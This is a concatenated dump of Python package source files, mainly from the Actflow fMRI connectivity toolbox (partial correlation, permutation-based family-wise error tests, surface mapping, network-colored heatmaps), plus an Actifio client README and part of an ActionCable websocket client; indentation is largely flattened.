    estimator: either 'EmpiricalCovariance' (the default) or 'LedoitWolf' for partial correlation with Ledoit-Wolf shrinkage
Output: connectivity_mat, formatted targets X sources
Credit goes to nilearn connectivity_matrices.py which contains code that was simplified for this use.
"""
nnodes = activity_matrix.shape[0]
timepoints = activity_matrix.shape[1]
if nnodes > timepoints:
print('activity_matrix shape: ',np.shape(activity_matrix))
raise Exception('More nodes (regressors) than timepoints! Use regularized regression')
if 2*nnodes > timepoints:
print('activity_matrix shape: ',np.shape(activity_matrix))
print('Consider using a shrinkage method')
if target_ts is None:
connectivity_mat = np.zeros((nnodes,nnodes))
# calculate covariance
        if estimator == 'LedoitWolf':
            cov_estimator = LedoitWolf(store_precision=False)
        elif estimator == 'EmpiricalCovariance':
            cov_estimator = EmpiricalCovariance(store_precision=False)
covariance = cov_estimator.fit(activity_matrix.T).covariance_
# calculate precision
precision = linalg.inv(covariance)
# precision to partial corr
diagonal = np.atleast_2d(1. / np.sqrt(np.diag(precision)))
correlation = precision * diagonal * diagonal.T
# Force exact 0. on diagonal
np.fill_diagonal(correlation, 0.)
connectivity_mat = -correlation
else:
#Computing values for a single target node
connectivity_mat = np.zeros((nnodes,1))
X = activity_matrix.T
y = target_ts
#Note: LinearRegression fits intercept by default (intercept beta not included in coef_ output)
reg = LinearRegression().fit(X, y)
connectivity_mat=reg.coef_
return connectivity_mat | Actflow | /Actflow-0.2.3.1-py3-none-any.whl/connectivity_estimation/partial_corrconn.py | partial_corrconn.py |
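# ---------------------------------------------------------------------------
# Illustrative usage sketch with random data (arbitrary dimensions; well over
# 2x more timepoints than nodes, as recommended above). Shows the expected
# input/output shapes of partial_corrconn() with Ledoit-Wolf shrinkage.
if __name__ == '__main__':
    rng = np.random.default_rng(0)
    nnodes, ntimepoints = 8, 100
    ts_data = rng.standard_normal((nnodes, ntimepoints))   # nodes x time
    pcorr = partial_corrconn(ts_data, estimator='LedoitWolf')
    print(pcorr.shape)                                       # -> (8, 8), diagonal forced to 0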
import numpy as np
import nibabel as nib
import h5py
import os
import pkg_resources
from .multregconn import *
from .corrcoefconn import *
from .pc_multregconn import *
dilateMM = 10
partitiondir = pkg_resources.resource_filename('ActflowToolbox.dependencies', 'ColeAnticevicNetPartition/')
defaultdlabelfile = partitiondir + 'CortexSubcortex_ColeAnticevic_NetPartition_wSubcorGSR_parcels_LR.dlabel.nii'
# maskdir cortex
dilatedmaskdir_cortex = pkg_resources.resource_filename('ActflowToolbox.network_definitions', 'Glasser2016/surfaceMasks/')
# maskdir subcortex
dilatedmaskdir_subcortex = pkg_resources.resource_filename('ActflowToolbox.network_definitions', 'CAB-NP/volumeMasks/')
def calcconn_parcelwise_noncircular_surface(data, connmethod='multreg', dlabelfile=defaultdlabelfile, dilated_parcels=True, precomputedRegularTS=None, subcortex=False, verbose=False):
"""
This function produces a parcel-to-parcel connectivity matrix while excluding vertices in the neighborhood of a given target parcel.
Excludes all vertices within a 10mm (default) dilated mask of the target parcel when computing parcel-to-parcel connectivity.
Takes in vertex-wise data and generates a parcel X parcel connectivity matrix based on provided connmethod
Currently only works for surface-based cortex connectivity
PARAMETERS:
data : vertex-wise data... vertices x time; default assumes that data is 96k dense array
connmethod : a string indicating what connectivity method to use. Options: 'multreg' (default), 'pearsoncorr', 'pc_multregconn'
dlabelfile : parcellation file; each vertex indicates the number corresponding to each parcel. dlabelfile needs to match same vertex dimensions of data
dilated_parcels : If True, will exclude vertices within 10mm of a target parcel's borders when computing mult regression fc (reducing spatial autocorrelation inflation)
precomputedRegularTS: optional input of precomputed 'regular' mean time series with original region set. This might cut down on computation time if provided.
subcortex : If True, will include subcortical volume rois from the CAB-NP
verbose : indicate if additional print commands should be used to update user on progress
RETURNS:
fc_matrix : Target X Source FC Matrix. Sources-to-target mappings are organized as rows (targets) from each column (source)
"""
if subcortex is False:
nparcels = 360
else:
nparcels = 718
# Load dlabel file (cifti)
if verbose: print('Loading in CIFTI dlabel file')
dlabels = np.squeeze(nib.load(dlabelfile).get_data())
# Find and sort unique parcels
unique_parcels = np.sort(np.unique(dlabels))
# Only include cortex (if flagged)
unique_parcels = unique_parcels[:nparcels]
# Instantiate empty time series matrix for regular mean time series, or load from memory if provided
if precomputedRegularTS is not None:
regular_ts_matrix = precomputedRegularTS
regular_ts_computed = np.ones((nparcels,1),dtype=bool)
else:
regular_ts_matrix = np.zeros((nparcels,data.shape[1]))
regular_ts_computed = np.zeros((nparcels,1))
# Instantiate empty fc matrix
fc_matrix = np.zeros((nparcels,nparcels))
for parcelInt,parcel in enumerate(unique_parcels):
if verbose: print('Computing FC for target parcel',parcelInt,'-',int(parcel),'/',len(unique_parcels))
# setup cortex/subcortex definitions
if parcelInt < 360:
dilatedmaskdir = dilatedmaskdir_cortex
atlas_label = 'Glasser'
else:
dilatedmaskdir = dilatedmaskdir_subcortex
atlas_label = 'Cabnp'
# Find where this parcel is in the unique parcel array
parcel_ind = np.where(unique_parcels==parcel)[0]
# Load in mask for target parcel
if dilated_parcels:
parcel_mask = np.squeeze(nib.load(dilatedmaskdir + atlas_label + 'Parcel' + str(int(parcel)) + '_dilated_10mm.dscalar.nii').get_data())
else:
parcel_mask = np.squeeze(nib.load(dilatedmaskdir + atlas_label + 'Parcel' + str(int(parcel)) + '.dscalar.nii').get_data())
# get all target ROI indices
target_ind = np.squeeze(nib.load(dilatedmaskdir + atlas_label + 'Parcel' + str(int(parcel)) + '.dscalar.nii').get_data())
target_ind = np.asarray(target_ind,dtype=bool)
if verbose: print('\t size of target:', np.sum(target_ind))
# remove target parcel's mask from set of possible source vertices
mask_ind = np.where(parcel_mask==1.0)[0] # find mask indices
source_indices = dlabels.copy() # copy the original parcellation dlabel file
source_indices[mask_ind] = 0 # modify original dlabel file to remove any vertices that are in the mask
# Identify all 'source' parcels to include when computing FC
source_parcels = np.delete(unique_parcels, parcel_ind)
# Now compute mean time series of each ROI using modified dlabel file after removing target parcel's mask (ie source_indices)
source_parcel_ts = np.zeros((len(source_parcels),data.shape[1])) # source regions X time matrix
        empty_source_row = [] # empty array to keep track of the row index of any sources that might be excluded
i = 0
for source in source_parcels:
source_ind = np.where(source_indices==source)[0] # Find source parcel indices (from modified dlabel file)
sourceInt = np.where(unique_parcels==source)[0]
#Determine if this source parcel was modified (if not, then use standard time series)
source_ind_orig = np.where(dlabels==source)[0]
if np.array_equal(source_ind,source_ind_orig):
if regular_ts_computed[sourceInt]:
source_parcel_ts[i,:] = regular_ts_matrix[sourceInt,:]
else:
source_parcel_ts[i,:] = np.nanmean(np.real(data[source_ind,:]),axis=0) # compute averaged time series of source parcel
#Save time series for future use
regular_ts_matrix[sourceInt,:] = source_parcel_ts[i,:].copy()
regular_ts_computed[sourceInt] = True
else:
# If the entire parcel is excluded (i.e, the time series is all 0s), then skip computing the mean for this parcel
if len(source_ind)==0:
empty_source_row.append(i) # if this source is empty, remember its row (to delete it from the regressor matrix later)
i += 1
# Go to next source parcel
continue
source_parcel_ts[i,:] = np.nanmean(np.real(data[source_ind,:]),axis=0) # compute averaged time series of source parcel
i += 1
# Delete source regions that have been entirely excluded from the source_parcels due to the dilation
if len(empty_source_row)>0:
source_parcel_ts = np.delete(source_parcel_ts,empty_source_row,axis=0) # delete all ROIs with all 0s from regressor matrix
source_parcels = np.delete(source_parcels,empty_source_row,axis=0) # Delete the 0-variance ROI from the list of sources
# compute averaged time series of TARGET
if regular_ts_computed[parcelInt]:
target_parcel_ts = regular_ts_matrix[parcelInt,:]
else:
target_parcel_ts = np.mean(np.real(data[target_ind,:]),axis=0)
#Save time series for future use
regular_ts_matrix[parcelInt,:] = target_parcel_ts.copy()
regular_ts_computed[parcelInt] = True
# Find matrix indices for all source parcels
source_cols = np.where(np.in1d(unique_parcels,source_parcels))[0]
target_row = parcelInt
if connmethod == 'multreg':
# run multiple regression, and add constant
fc_matrix[target_row,source_cols] = multregconn(source_parcel_ts,target_parcel_ts)
elif connmethod == 'pearsoncorr':
fc_matrix[target_row,source_cols] = corrcoefconn(source_parcel_ts,target_parcel_ts)
elif connmethod == 'pc_multregconn':
fc_matrix[target_row,source_cols] = pc_multregconn(source_parcel_ts,target_parcel_ts)
return fc_matrix | Actflow | /Actflow-0.2.3.1-py3-none-any.whl/connectivity_estimation/calcconn_parcelwise_noncircular_surface.py | calcconn_parcelwise_noncircular_surface.py |
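# ---------------------------------------------------------------------------
# Illustrative usage sketch (commented out because it needs real CIFTI data and
# the packaged mask files). The file path below is a hypothetical placeholder;
# the input must be a vertices x time dense array matching the default dlabel
# parcellation used by this module.
# if __name__ == '__main__':
#     cifti = nib.load('/path/to/subject_rest.dtseries.nii')   # hypothetical path
#     data = np.squeeze(cifti.get_data()).T                      # vertices x time
#     fc = calcconn_parcelwise_noncircular_surface(data, connmethod='multreg', verbose=True)
#     print(fc.shape)                                            # -> (360, 360), targets x sources (cortex only)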
import numpy as np
import nibabel as nib
import os
import pkg_resources
#import subprocess
#toolsdir = pkg_resources.resource_filename('ActflowToolbox.tools', '/')
#glasserfile2=toolsdir+'Q1-Q6_RelatedParcellation210.LR.CorticalAreas_dil_Colors.32k_fs_RL.dlabel.nii'
dependenciesdir = pkg_resources.resource_filename('ActflowToolbox.dependencies', '/')
glasserfile2=dependenciesdir+'ColeAnticevicNetPartition/CortexSubcortex_ColeAnticevic_NetPartition_wSubcorGSR_parcels_LR.dlabel.nii'
def map_to_surface(mat,filename,nParcels=360,glasserfile2=glasserfile2,fliphemispheres=False):
"""
Maps a region X column 2d matrix into a dscalar file with 64k vertices
Uses the Glasser et al. 2016 ROI parcellation
Input Parameters:
mat : region x column (features/activations, etc.) 2D MATRIX to be mapped onto the surface. MUST BE A 2D MATRIX.
mat can either be 360 mat or ~59k mat. If 360, will automatically map back to ~59k
    filename: a string indicating the directory + filename of the output. Do not include a suffix (e.g., ".dscalar.nii") in the filename; suffixes will be added automatically.
fliphemispheres: If the data were originally loaded using RL (right hemisphere then left) convention the data should be
flipped, since CAB-NP uses LR (left hemisphere then right). A setting of True will flip the hemispheres.
"""
if fliphemispheres:
print('Flipping hemispheres')
newmat=np.zeros(mat.shape)
newmat[0:180]=mat[180:360]
newmat[180:360]=mat[0:180]
mat=newmat.copy()
#### Load glasser atlas
glasser2 = nib.load(glasserfile2).get_data()
glasser2 = np.squeeze(glasser2)
#### Map back to surface
if mat.shape[0]==nParcels:
out_mat = np.zeros((glasser2.shape[0],mat.shape[1]))
for roi in np.arange(nParcels):
vertex_ind = np.where(glasser2==roi+1)[0]
for col in range(mat.shape[1]):
out_mat[vertex_ind,col] = mat[roi,col]
else:
out_mat = mat
####
# Write file to csv and run wb_command
np.savetxt(filename + '.csv', out_mat,fmt='%s')
wb_file = filename + '.dscalar.nii'
wb_command = 'wb_command -cifti-convert -from-text ' + filename + '.csv ' + glasserfile2 + ' ' + wb_file + ' -reset-scalars'
#os.system(wb_command)
print('Command:')
print(wb_command)
try:
#subprocess.call(wb_command)
os.system(wb_command)
os.remove(filename + '.csv')
print("CIFTI dscalar is output as:" + wb_file)
except OSError:
print ('wb_command does not exist') | Actflow | /Actflow-0.2.3.1-py3-none-any.whl/tools/map_to_surface.py | map_to_surface.py |
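# ---------------------------------------------------------------------------
# Illustrative usage sketch (commented out because it writes files and needs
# wb_command on the PATH). The output path is a hypothetical placeholder; the
# input must be a 2D regions x columns matrix.
# if __name__ == '__main__':
#     region_values = np.random.randn(360, 1)             # must be 2D: regions x columns
#     map_to_surface(region_values, '/tmp/example_map')    # writes /tmp/example_map.dscalar.nii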
# Code to perform permutation testing to control for family-wise error (FWE)
# Using max-T approach as described in Nichols & Holmes (2002)
# Nichols TE, Holmes AP. (2002). Nonparametric permutation tests for functional neuroimaging: A primer with Examples. Hum. Brain Mapp., 15: 1-25. doi:10.1002/hbm.1058
import numpy as np
import scipy.stats as stats
import multiprocessing as mp
from statsmodels.distributions.empirical_distribution import ECDF
###
# max_r approach (for, e.g., individual difference correlations)
def max_r(data_arr, behav_arr, alpha=.05, tail=2, permutations=1000, nproc=1, pvals=False):
"""
Performs family-wise error correction using permutation testing (Nichols & Holmes 2002)
    Uses correlations as the test statistic (as opposed to t-statistics). Can be used for RSA-type analyses or individual difference correlations.
Note! Assumes a two-tailed test (specify tail of test by tail parameter)
Citation:
Nichols TE, Holmes AP. (2002). Nonparametric permutation tests for functional neuroimaging: A primer with Examples. Hum. Brain Mapp., 15: 1-25. doi:10.1002/hbm.1058
Required Parameters:
data_arr = MxN matrix of set of M independent measurements (e.g., FC-values) across N subjects
behav_arr = Nx1 array of behavioral measures for N subjects
Optional Parameters:
alpha = alpha value to return the maxT threshold {default = .05}
    tail = [1, -1, or 2]
If tail = 1, reject the null hypothesis if the correlation is greater than the null dist (upper tailed test).
If tail = -1, reject the null hypothesis if the correlation is less than the null dist (lower tailed test).
If tail = 2, reject the null hypothesis for a two-tailed test
{default : 2}
permutations = Number of permutations to perform {default = 1000}
nproc = number of processes to run in parallel {default = 1}
pvals = if True, returns equivalent p-value distribution for all t-values {default = True}
Returns:
r : Array of Pearson-r values of the true correlations map (Mx1 vector, for M tests)
maxRThreshold : The Pearson-r value corresponding to the corrected alpha value. If a two-tailed test is specified, the absolute value of the maxR threshold is provided.
p (optional) : Array of FWE-corrected p-values (Mx1 vector, for M tests);
N.B.: Only works for paired one-sample t-tests
"""
# Calculating the TRUE Pearson correlations in a vectorized format (increasing speed)
data_normed = stats.zscore(data_arr,axis=1)
behav_normed = stats.zscore(behav_arr)
trueR = np.mean(np.multiply(behav_normed,data_normed),axis=1)
# Prepare inputs for multiprocessing
inputs = []
for i in range(permutations):
seed = np.random.randint(0,100000,1)[0]
inputs.append((data_normed,behav_normed,tail,seed))
pool = mp.Pool(processes=nproc)
    result = pool.starmap_async(_maxRpermutation,inputs).get() # starmap unpacks each (data, behav, tail, seed) tuple
pool.close()
pool.join()
# Returns an array of T-values distributions (our null distribution of "max-T" values)
maxR_dist = np.asarray(result)
#Find threshold for alpha
maxR_dist_sorted = np.sort(maxR_dist)
# Specify which tail we want
if tail == 1:
topPercVal_maxR_inx = int(len(maxR_dist_sorted)*(1-alpha))
maxR_thresh = maxR_dist_sorted[topPercVal_maxR_inx]
elif tail == -1:
topPercVal_maxR_inx = int(len(maxR_dist_sorted)*(alpha))
maxR_thresh = maxR_dist_sorted[topPercVal_maxR_inx]
elif tail == 2:
topPercVal_maxR_inx = int(len(maxR_dist_sorted)*(1-alpha))
maxR_thresh = maxR_dist_sorted[topPercVal_maxR_inx]
# elif tail == 0:
# topPercVal_maxR_inx = int(len(maxR_dist_sorted)*(alpha/2.0))
# botPercVal_maxR_inx = int(len(maxR_dist_sorted)*(1-alpha/2.0))
# # Provide two r thresholds for two-tailed test
# topR_thresh = maxR_dist_sorted[topPercVal_maxR_inx]
# botR_thresh = maxR_dist_sorted[botPercVal_maxR_inx]
if pvals:
# Construct ECDF from maxT_dist
ecdf = ECDF(maxR_dist)
# Return p-values from maxT_dist using our empirical CDF (FWE-corrected p-values)
p_fwe = ecdf(trueR)
if tail == 1 or tail == 2:
p_fwe = 1.0 - p_fwe
#if tail!=0:
return trueR, maxR_thresh, p_fwe
else:
#if tail!=0:
return trueR, maxR_thresh
def _maxRpermutation(data_normed,behav_normed,tail,seed):
"""
Helper function to perform a single permutation
Assumes the first row are the labels (or behavioral measures)
"""
np.random.seed(seed)
# Randomly permute behavioral data along 2nd dimension (subjects). Note: np.random.shuffle() requires transposes
np.take(behav_normed,np.random.rand(len(behav_normed)).argsort(),out=behav_normed)
# Randomly permute measurement data along 2nd dimension (subjects). Note: np.random.shuffle() requires transposes
#np.take(data_normed,np.random.rand(data_normed.shape[1]).argsort(),axis=1,out=data_normed)
# Calculating Pearson correlations in a vectorized format (increasing speed)
r_values = np.mean(np.multiply(behav_normed,data_normed),axis=1)
if tail==1:
maxR = np.max(r_values)
elif tail==-1:
maxR = np.min(r_values)
elif tail==2:
maxR = np.max(np.abs(r_values))
return maxR | Actflow | /Actflow-0.2.3.1-py3-none-any.whl/tools/max_r.py | max_r.py |
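# ---------------------------------------------------------------------------
# Illustrative usage sketch with random data (arbitrary numbers of tests,
# subjects, and permutations), guarded so it only runs when this file is
# executed directly (also required for the multiprocessing pool on spawn-based
# platforms).
if __name__ == '__main__':
    rng = np.random.default_rng(0)
    n_tests, n_subjects = 50, 30
    measures = rng.standard_normal((n_tests, n_subjects))   # M measurements x N subjects
    behavior = rng.standard_normal(n_subjects)                # one behavioral score per subject
    r_vals, r_thresh, p_fwe = max_r(measures, behavior, permutations=100, nproc=1, pvals=True)
    print(r_vals.shape, r_thresh)                             # 50 observed r values and the FWE-corrected r threshold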
import numpy as np
import matplotlib.pyplot as plt;
import matplotlib.patches as patches;
import matplotlib.colors as colors
import seaborn as sns
def addNetColors(fcMatrix):
""" A function to generate a heatmap figure with CAB-NP colors added along axes of FC matrix; python 3
INPUT
fcMatrix: a node x node matrix of FC estimates (in the Glasser parcellation, this would be 360 x 360, and presumably the 'grand mean' across subjects and states)
Note: fcMatrix nodes should be sorted into their network order
OUTPUT
fig: a handle for the generated figure, can be used to save it, ex python code:
fig = addNetColors(fcMatrix)
figDirectory = '/path/to/your/figure/directory/here/';
figFileName = figDirectory + 'figureName.png'; fig.savefig(figFileName, bbox_inches='tight', format='png', dpi=250);
"""
# CAB-NP & Glasser parcellation variables
orderedNetworks = ['VIS1','VIS2','SMN','CON','DAN','LAN','FPN','AUD','DMN','PMM','VMM','ORA']
colorList = [(0, 0, 1),(0.3922, 0, 1),(0, 1, 1),(0.6, 0, 0.6),(0, 1, 0),(0, 0.6, 0.6),(1, 1, 0),(0.98, 0.24, 0.98),(1, 0, 0),(0.7, 0.35, 0.16),(1, 0.6, 0),(0.25, 0.5, 0)];
netBoundaries = [(0,5,6),(6,59,54),(60,98,39),(99,154,56),(155,177,23),(178,200,23),(201,250,50),(251,265,15),(266,342,77),(343,349,7),(350,353,4),(354,359,6)];
[nParcels,nParcels] = np.shape(fcMatrix);
[numNets,c] = np.shape(colorList);
# Make room in FC matrix for network colors
bottomSize = (10,nParcels); topSize = (nParcels+10,10);
bottomBuff = np.zeros(bottomSize); topBuff = np.zeros(topSize);
bottomBuff = (bottomBuff+1)*0.31; topBuff = (topBuff+1)*0.31; # 0.31 is somewhat arbitrary, if it looks funny, change this number
bottomAdd = np.vstack((fcMatrix,bottomBuff)); fcMatrixWithBuffer = np.hstack((bottomAdd,topBuff));
np.fill_diagonal(fcMatrixWithBuffer, 0);
#return fcMatrixWithBuffer;
# Generate figure
fig,ax = plt.subplots(1,figsize=(7,7),facecolor=(1,1,1))
v_min = np.min(fcMatrix)
v_max = np.max(fcMatrix)
v_mid = 0
plt.imshow(fcMatrixWithBuffer,origin='upper',cmap='seismic', interpolation='none', norm=MidpointNormalize(midpoint=v_mid,vmin=v_min, vmax=v_max), clim=(v_min, v_max));
#sns.heatmap(fcMatrixWithBuffer,square=True,center=0,cmap='seismic',cbar=True,xticklabels=50,yticklabels=50)
plt.ylabel('Regions',fontsize=20); plt.xlabel('Regions',fontsize=20);
cBarH = plt.colorbar(fraction=.045);
cBarH.set_label('FC Estimates', size=15);
plt.subplots_adjust(left=None, bottom=None, right=1, top=1, wspace=1, hspace=1);
# Add network colors to the "buffered" axes
netList = list(range(numNets));
for net in netList:
thisNet = netBoundaries[net]; netSize = thisNet[2]; netStart = thisNet[0];
rectH = patches.Rectangle((netStart-1,359),netSize,10,linewidth=1,edgecolor=colorList[net],facecolor=colorList[net]);
rectV = patches.Rectangle((359,netStart-1),10,netSize,linewidth=1,edgecolor=colorList[net],facecolor=colorList[net]);
ax.add_patch(rectH); ax.add_patch(rectV);
rectWhite = patches.Rectangle((nParcels-1,nParcels-1),10,10,linewidth=1,edgecolor='white',facecolor='white'); ax.add_patch(rectWhite);
# set global params & show image
plt.box(0); cbLim = np.max([abs(np.min(fcMatrixWithBuffer)),np.max(fcMatrixWithBuffer)]);
#plt.clim(round(cbLim*-1,1),round(cbLim,1)); cBarH.outline.set_visible(False);
plt.rc('ytick',labelsize=10); plt.rc('xtick',labelsize=10);
ax.tick_params(axis=u'both', which=u'both',length=0); plt.box(0);
plt.show()
return fig; # can use this output to save generated figure in Jupyter notebook, etc.
class MidpointNormalize(colors.Normalize):
"""
    Normalise the colorbar so that diverging bars work their way out to either side of a prescribed midpoint value
e.g. im=ax1.imshow(array, norm=MidpointNormalize(midpoint=0.,vmin=-100, vmax=100))
"""
def __init__(self, vmin=None, vmax=None, midpoint=None, clip=False):
self.midpoint = midpoint
colors.Normalize.__init__(self, vmin, vmax, clip)
def __call__(self, value, clip=None):
# I'm ignoring masked values and all kinds of edge cases to make a
# simple example...
x, y = [self.vmin, self.midpoint, self.vmax], [0, 0.5, 1]
return np.ma.masked_array(np.interp(value, x, y), np.isnan(value)) | Actflow | /Actflow-0.2.3.1-py3-none-any.whl/tools/addNetColors.py | addNetColors.py |
import numpy as np
import scipy.stats as stats
import multiprocessing as mp
from statsmodels.distributions.empirical_distribution import ECDF
from functools import partial
def max_t(input_arr, nullmean=0, alpha=.05, tail=2, permutations=1000, nproc=1, pvals=True, output_nulldist=False, nan_policy='propagate'):
"""
    Performs family-wise error correction using permutation testing (Nichols & Holmes 2002).
This function runs a one-sample t-test vs. 0 or, equivalently, a paired t-test (if the user subtracts two conditions prior to input).
Assumes a two-sided t-test (specify tail of test by tail parameter).
Citation:
Nichols TE, Holmes AP. (2002). Nonparametric permutation tests for functional neuroimaging: A primer with Examples. Hum. Brain Mapp., 15: 1-25. doi:10.1002/hbm.1058
Required Parameters:
input_arr = MxN matrix of set of M independent observations across N subjects. M one-sample t-tests
(condition 1 vs. nullmean) or M paired t-tests (condition 1 minus condition 2) will be conducted,
correcting for multiple comparisons via the maxT approach.
Note that the user must subtract the two conditions prior to using this function in the
paired t-test case.
Optional Parameters:
nullmean = Expected value of the null hypothesis {default = 0, for a t-test against 0}
alpha = Optional. alpha value to return the maxT threshold {default = .05}
    tail = Optional. [1, -1, or 2]
If tail = 1, reject the null hypothesis if the statistic is greater than the null dist (upper tailed test).
If tail = -1, reject the null hypothesis if the statistic is less than the null dist (lower tailed test).
If tail = 2, reject the null hypothesis for a two-tailed test
{default : 2}
permutations = Optional. Number of permutations to perform {default = 1000}
nproc = Optional. number of processes to run in parallel {default = 1}. NOTE: Could crash your Python session if it's set to a number over 1; it appears there is a bug that needs to be fixed.
pvals = Optional. if True, returns equivalent p-value distribution for all t-values {default = True}
nan_policy = Optional. What to do with NaN values when being sent to the t-test function. See scipy.stats.ttest_1samp (https://docs.scipy.org/doc/scipy/reference/generated/scipy.stats.ttest_1samp.html) for details. The default is to pass NaN values into the t-test function rather than ignoring them. {default = 'propagate'}
Returns:
t: Array of T-values of correct contrast map (Mx1 vector, for M tests)
    maxTThreshold : The t-value threshold corresponding to the corrected alpha value. If a two-tailed test is specified, the maxT threshold is provided as an absolute value
p (optional) : Array of FWE-corrected p-values (Mx1 vector, for M tests);
maxT_dist (optional): Array of maxT null distribution values
"""
# Focus on difference matrix -- more computationally feasible (and less data to feed into parallel processing)
# Prepare inputs for multiprocessing
seeds = np.zeros(permutations)
for i in np.arange(permutations):
seeds[i] = np.random.randint(0,100000,1)[0]
pool = mp.Pool(processes=nproc)
_maxTpermutation_partial=partial(_maxTpermutation, input_arr=input_arr, nullmean=nullmean, tail=tail, nan_policy=nan_policy)
result = pool.map_async(_maxTpermutation_partial,seeds).get()
pool.close()
pool.join()
# Returns an array of T-values distributions (our null distribution of "max-T" values)
maxT_dist = np.asarray(result)
#Find threshold for alpha
maxT_dist_sorted = np.sort(maxT_dist)
# Specify which tail we want
if tail == 1:
topPercVal_maxT_inx = int(len(maxT_dist_sorted)*(1-alpha))
maxT_thresh = maxT_dist_sorted[topPercVal_maxT_inx]
elif tail == -1:
topPercVal_maxT_inx = int(len(maxT_dist_sorted)*(alpha))
maxT_thresh = maxT_dist_sorted[topPercVal_maxT_inx]
elif tail == 2:
topPercVal_maxT_inx = int(len(maxT_dist_sorted)*(1-alpha))
maxT_thresh = maxT_dist_sorted[topPercVal_maxT_inx]
# Obtain real t-values
t = stats.ttest_1samp(input_arr, nullmean, axis=1, nan_policy=nan_policy)[0]
if pvals:
# # Construct ECDF from maxT_dist
# ecdf = ECDF(maxT_dist)
# # Return p-values from maxT_dist using our empirical CDF (FWE-corrected p-values)
# p_fwe = ecdf(t)
# if tail == 1 or tail == 2:
# p_fwe = 1.0 - p_fwes
if tail==1:
#Percent of null t-values greater than observed t-value
p_fwe = np.array([np.mean(maxT_dist>=tval) for tval in t])
elif tail==-1:
#Percent of null t-values less than observed t-value
p_fwe = np.array([np.mean(maxT_dist<=tval) for tval in t])
elif tail==2:
#Percent of null t-values greater or less than observed t-value (the abs value in null distribution accounts for 2 tails)
p_fwe = np.array([np.mean(maxT_dist>=np.abs(tval)) for tval in t])
if output_nulldist:
return t, maxT_thresh, p_fwe, maxT_dist
else:
return t, maxT_thresh, p_fwe
else:
if output_nulldist:
return t, maxT_thresh, maxT_dist
else:
return t, maxT_thresh
def _maxTpermutation(seed,input_arr,nullmean,tail,nan_policy='propagate'):
"""
Helper function to perform a single permutation
"""
np.random.seed(int(seed))
# Create a random matrix to shuffle conditions (randomly multiply contrasts by 1 or -1)
shufflemat = np.random.normal(0,1,input_arr.shape)
pos = shufflemat > 0
neg = shufflemat < 0
# matrix of 1 and -1
shufflemat = pos + neg*(-1)
# Shuffle raw values
input_arr = np.multiply(input_arr, shufflemat)
# Take t-test against 0 for each independent test
t_matrix = stats.ttest_1samp(input_arr,nullmean,axis=1, nan_policy=nan_policy)[0]
if tail==1:
maxT = np.max(t_matrix)
elif tail==-1:
maxT = np.min(t_matrix)
elif tail==2:
maxT = np.max(np.abs(t_matrix))
return maxT | Actflow | /Actflow-0.2.3.1-py3-none-any.whl/tools/max_t.py | max_t.py |
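# ---------------------------------------------------------------------------
# Illustrative usage sketch with random data (arbitrary numbers of tests,
# subjects, and permutations), guarded so it only runs when this file is
# executed directly (also required for the multiprocessing pool on spawn-based
# platforms).
if __name__ == '__main__':
    rng = np.random.default_rng(0)
    n_tests, n_subjects = 50, 30
    contrast = rng.standard_normal((n_tests, n_subjects)) + 0.5   # e.g., condition1 minus condition2, per subject
    t_vals, t_thresh, p_fwe = max_t(contrast, permutations=100, nproc=1)
    print(t_vals.shape, t_thresh)                                   # 50 t-values and the FWE-corrected t threshold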
# Actifio Python Client Library
This is a Python package for the Actifio REST API. It wraps the REST API to provide the UDS and SARG functions, and also offers higher-level convenience functionality on top of them.
# Install
To install, we always recommend using ```pip```.
```
pip install Actifio
```
# Documentation
You can find the documentation [here](https://actifio-python-client-library.readthedocs.io/en/latest/index.html).
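# Example usage
The snippet below is an illustrative sketch only: the class and method names used here (`Actifio`, `run_uds_command`) are assumptions based on the package description above, so check the documentation linked above for the exact API and arguments.
```python
from Actifio import Actifio

# Hypothetical appliance details
appliance = Actifio("appliance-hostname", "admin", "password")

# Run a UDS "info" command (the equivalent of "udsinfo lsversion" on the appliance CLI)
print(appliance.run_uds_command("info", "lsversion", {}))
```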
License
-------
Copyright 2018 <Kosala Atapattu [email protected]>
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
| Actifio | /Actifio-1.0.2.tar.gz/Actifio-1.0.2/README.md | README.md |
import threading
import uuid
import json
import logging
import time
import websocket
class Connection:
"""
The connection to a websocket server
"""
def __init__(self, url, origin=None, log_ping=False, cookie=None, header=None):
"""
:param url: The url of the cable server.
:param origin: (Optional) The origin.
:param log_ping: (Default: False) If true every
ping gets logged.
:param cookie: (Optional) A cookie to send (used for
authentication for instance).
:param header: (Optional) custom header for websocket handshake.
"""
self.url = url
self.origin = origin
self.log_ping = log_ping
self.cookie = cookie
self.header = header
self.logger = logging.getLogger('ActionCable Connection')
self.subscriptions = {}
self.websocket = None
self.ws_thread = None
self.auto_reconnect = False
if origin is not None:
self.origin = origin
def connect(self, origin=None):
"""
Connects to the server.
:param origin: (Optional) The origin.
"""
self.logger.debug('Establish connection...')
if self.connected:
self.logger.warning('Connection already established. Return...')
return
if origin is not None:
self.origin = origin
self.auto_reconnect = True
self.ws_thread = threading.Thread(
name="APIConnectionThread_{}".format(uuid.uuid1()),
target=self._run_forever)
self.ws_thread.daemon = True
self.ws_thread.start()
def disconnect(self):
"""
Closes the connection.
"""
self.logger.debug('Close connection...')
self.auto_reconnect = False
if self.websocket is not None:
self.websocket.close()
def _run_forever(self):
while self.auto_reconnect:
try:
self.logger.debug('Run connection loop.')
self.websocket = websocket.WebSocketApp(
self.url,
cookie=self.cookie,
header=self.header,
on_message=self._on_message,
on_close=self._on_close)
self.websocket.on_open = self._on_open
self.websocket.run_forever(ping_interval=5, ping_timeout=3, origin=self.origin)
time.sleep(2)
except Exception as exc:
self.logger.error('Connection loop raised exception. Exception: %s', exc)
def send(self, data):
"""
Sends data to the server.
"""
